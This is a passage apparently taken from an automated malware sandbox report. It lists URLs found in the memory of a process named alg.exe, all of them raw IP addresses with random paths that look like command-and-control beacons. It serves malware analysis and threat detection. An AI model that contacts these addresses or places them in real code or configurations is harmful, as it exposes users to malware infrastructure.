                        Source: alg.exe, 00000005.00000003.2811918640.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2771431034.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2821864703.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789033998.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2835349419.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2834833089.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2802192029.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2753891566.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2823194050.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2772930707.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2743038137.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789664879.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2755280881.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2833788720.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/gkytxybgvmhelxm
                        Source: alg.exe, 00000005.00000003.3114457566.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/nuxw/
                        Source: alg.exe, 00000005.00000003.3049728278.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3039039021.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2994346081.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2926285208.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3014767523.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2958285127.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3137902301.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3081966970.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2960157911.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2975754549.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3023493626.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3159455853.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3067889124.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3100171023.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2998082643.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3160342270.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3098884658.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2924610727.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2940973706.00000000004D6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3083445109.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/qlckdyepimpj
                        Source: alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/uxw
                        Source: alg.exe, 00000005.00000003.2407212765.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2406458559.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/bW
                        Source: alg.exe, 00000005.00000003.2726508164.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/ghraajhdoy
                        Source: alg.exe, 00000005.00000003.2789033998.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789664879.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/nuxw
                        Source: alg.exe, 00000005.00000003.2529312327.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/nwcfdqaloklmslqo
                        Source: alg.exe, 00000005.00000003.2924953400.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/qlckdyepimpj
                        Source: alg.exe, 00000005.00000003.2976836781.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/rgh
                        Source: alg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/
                        Source: alg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/4s/
                        Source: alg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/7
                        Source: alg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/mwix
                        Source: alg.exe, 00000005.00000003.2586093883.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20:80/ahktjonxxxw
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2453136233.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2462147543.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2475832779.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2484442464.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138//
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/3
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/;
                        Source: alg.exe, 00000005.00000003.2453136233.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/IO
                        Source: alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/blqwxioreon
                        Source: alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/blqwxioreons
                        Source: alg.exe, 00000005.00000003.2197258729.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/eybmhvtk
                        Source: alg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2475832779.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2484442464.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/p
                        Source: alg.exe, 00000005.00000003.2453136233.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/qntnr
                        Source: alg.exe, 00000005.00000003.2453136233.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/qntnrk
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/s7
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/v
                        Source: alg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/vfgrjxuhtsfio
                        Source: alg.exe, 00000005.00000003.2461628968.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2463088351.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/vfgrjxuhtsfioI
                        Source: alg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/vfgrjxuhtsfioXwL
                        Source: alg.exe, 00000005.00000003.2197258729.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189007614.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2188900760.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/blqwxioreon
                        Source: alg.exe, 00000005.00000003.2197258729.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2198338428.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2198985007.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/eybmhvtkP4
                        Source: alg.exe, 00000005.00000003.2447576365.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2448344378.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/qntnr
                        Source: alg.exe, 00000005.00000003.2461628968.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2462147543.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/vfgrjxuhtsfio
                        Source: alg.exe, 00000005.00000003.2156875870.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2652374173.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2438061645.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                        Source: alg.exe, 00000005.00000003.2438061645.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/aymirwrcjb
                        Source: alg.exe, 00000005.00000003.2438061645.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/aymirwrcjbc5fa
                        Source: alg.exe, 00000005.00000003.2708373210.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2773708349.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2756072991.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2744437728.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2727806558.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2697962787.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2687212186.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/boysd
                        Source: alg.exe, 00000005.00000003.2687212186.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/boysdS
                        Source: alg.exe, 00000005.00000003.2652374173.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2661319349.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/glpq
                        Source: alg.exe, 00000005.00000003.2652374173.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2661319349.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ngs
                        Source: alg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3198048536.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3137902301.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3081966970.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3170824073.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3184983219.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3159455853.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3067889124.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3100171023.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3160342270.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/nhvixgstciqyn
                        Source: alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ovtsne
                        Source: alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ovtsne#
                        Source: alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ovtsne24.400
                        Source: alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/s7
                        Source: alg.exe, 00000005.00000003.2156875870.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/vrnakrk
                        Source: alg.exe, 00000005.00000003.2156875870.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/vrnakrkG
                        Source: alg.exe, 00000005.00000003.2156875870.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/vrnakrkbcc5fa
                        Source: alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/vtsneg
                        Source: alg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3198048536.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3170824073.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3184983219.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3159455853.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3160342270.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3238419493.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/yadhctxanlnpjhwu
                        Source: alg.exe, 00000005.00000003.3160893686.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3157092791.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/yadhctxanlnpjhwuW
                        Source: alg.exe, 00000005.00000003.2958285127.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/afeeapyprlxrxabk
                        Source: alg.exe, 00000005.00000003.2447576365.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2448344378.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2437065367.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2437641494.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/aymirwrcjb
                        Source: alg.exe, 00000005.00000003.2686090293.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/boysd
                        Source: alg.exe, 00000005.00000003.2651348452.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/glpqI0
                        Source: alg.exe, 00000005.00000003.2251455515.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2214413376.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2213751146.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/ovtsne
                        Source: alg.exe, 00000005.00000003.3159455853.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/yadhctxanlnpjhwuP
                        Source: alg.exe, 00000005.00000003.2484442464.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/
                        Source: alg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/hbbreaeoihjkosw
                        Source: alg.exe, 00000005.00000003.2483443022.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2484442464.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/mjdasdrrrpdajiq
                        Source: alg.exe, 00000005.00000003.2484442464.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/mjdasdrrrpdajiqswq
                        Source: alg.exe, 00000005.00000003.2811918640.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2771431034.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2821864703.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789033998.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2835349419.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2834833089.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2726508164.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2802192029.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2753891566.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2823194050.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2772930707.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2707287809.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2743038137.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789664879.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2755280881.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2833788720.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/nmtgacidyycmw
                        Source: alg.exe, 00000005.00000003.2669009554.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2660006964.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/qwtkmqbsexpiki
                        Source: alg.exe, 00000005.00000003.3049728278.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3039039021.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2994346081.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2926285208.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3014767523.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2958285127.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2960157911.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2975754549.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3023493626.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2904771126.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2998082643.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2924610727.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2940973706.00000000004D6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2942052776.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2977052815.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/rujiughdxo
                        Source: alg.exe, 00000005.00000003.2484442464.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/s7
                        Source: alg.exe, 00000005.00000003.3213397923.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/hbbreaeoihjkosw
                        Source: alg.exe, 00000005.00000003.2483443022.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2484061921.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/mjdasdrrrpdajiqP
                        Source: alg.exe, 00000005.00000003.2707287809.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/nmtgacidyy
                        Source: alg.exe, 00000005.00000003.2660006964.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/qwtkmqbsexpiki
                        Source: alg.exe, 00000005.00000003.2904771126.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/rujiughdxo
                        Source: alg.exe, 00000005.00000003.2994346081.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/snkuws
                        Source: alg.exe, 00000005.00000003.3274901650.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/sylvrey
                        Source: alg.exe, 00000005.00000003.2697962787.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/
                        Source: alg.exe, 00000005.00000003.3114457566.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/hchtqxq
                        Source: alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3285380290.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3264636992.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/opniaqqvrovhwu
                        Source: alg.exe, 00000005.00000003.2845772306.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2811918640.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2771431034.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2821864703.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2847122391.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789033998.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2834833089.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2698840513.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2726508164.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2802192029.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2753891566.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2696891139.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2823194050.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2772930707.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2707287809.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2743038137.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789664879.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2755280881.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2833788720.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/tqpwjhvmbciki
                        Source: alg.exe, 00000005.00000003.2697962787.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/ysdS
                        Source: alg.exe, 00000005.00000003.3014767523.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120:80/hchtqxqF;.F
                        Source: alg.exe, 00000005.00000003.3264636992.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120:80/opniaqqvrov
                        Source: alg.exe, 00000005.00000003.2698840513.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2696891139.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120:80/tqpwjhvmbc
                        Source: alg.exe, 00000005.00000003.2609540931.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2621213116.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/
                        Source: alg.exe, 00000005.00000003.2609540931.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/7
                        Source: alg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/F
